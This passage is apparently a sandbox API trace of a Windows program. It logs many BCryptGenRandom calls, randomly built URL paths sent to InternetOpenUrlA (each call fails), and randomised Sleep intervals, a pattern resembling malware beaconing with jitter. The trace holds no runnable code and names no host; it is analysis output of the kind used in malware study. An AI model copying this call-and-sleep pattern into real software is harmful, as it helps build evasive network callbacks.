out: pbBuffer=0x46ffd5d) returned 0x0 [0201.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.434] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.435] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0201.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0201.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0201.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0201.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0201.441] GetProcessHeap () returned 0x440000 [0201.441] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0201.441] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0201.441] lstrcatA (in: lpString1="\x04", lpString2="/deknfKv6kswqefG6/ua4aSDi2weufdwl9ymvkf5oht7Pb86xkehz3777xq/o3h0AYpe9kov230Egqjzd4/c2g5yvL1jnqofsvnkZmAannr4uvznAFinq22v/" | out: lpString1="\x04/deknfKv6kswqefG6/ua4aSDi2weufdwl9ymvkf5oht7Pb86xkehz3777xq/o3h0AYpe9kov230Egqjzd4/c2g5yvL1jnqofsvnkZmAannr4uvznAFinq22v/") returned="\x04/deknfKv6kswqefG6/ua4aSDi2weufdwl9ymvkf5oht7Pb86xkehz3777xq/o3h0AYpe9kov230Egqjzd4/c2g5yvL1jnqofsvnkZmAannr4uvznAFinq22v/" [0201.441] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0201.442] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/deknfKv6kswqefG6/ua4aSDi2weufdwl9ymvkf5oht7Pb86xkehz3777xq/o3h0AYpe9kov230Egqjzd4/c2g5yvL1jnqofsvnkZmAannr4uvznAFinq22v/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0201.442] GetProcessHeap () returned 0x440000 [0201.442] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0201.442] GetProcessHeap () returned 0x440000 [0201.442] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0201.442] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0201.443] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0201.443] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0201.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0201.443] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0201.821] Sleep (dwMilliseconds=0x150c1) [0202.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0202.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0202.134] GetProcessHeap () returned 0x440000 [0202.134] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5af0 [0202.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0202.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5af1, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x4f5af1) returned 0x0 [0202.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0202.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.138] GetProcessHeap () returned 0x440000 [0202.138] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0202.138] lstrcpyA (in: lpString1=0x473da0, lpString2="ðZO" | out: lpString1="ðZO") returned="ðZO" [0202.138] lstrcatA (in: lpString1="ðZO", lpString2="/nDf6FidRrKk8MzeKsy/" | out: lpString1="ðZO/nDf6FidRrKk8MzeKsy/") returned="ðZO/nDf6FidRrKk8MzeKsy/" [0202.139] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0202.139] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ðZO/nDf6FidRrKk8MzeKsy/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0202.139] GetProcessHeap () returned 0x440000 [0202.139] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0202.139] GetProcessHeap () returned 0x440000 [0202.139] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5af0 | out: hHeap=0x440000) returned 1 [0202.139] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0202.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0202.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0202.140] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0202.140] Sleep (dwMilliseconds=0x1d263) [0202.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0202.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0202.422] GetProcessHeap () returned 0x440000 [0202.422] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0202.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0202.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0202.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0202.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.432] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.432] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0202.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0202.433] GetProcAddress 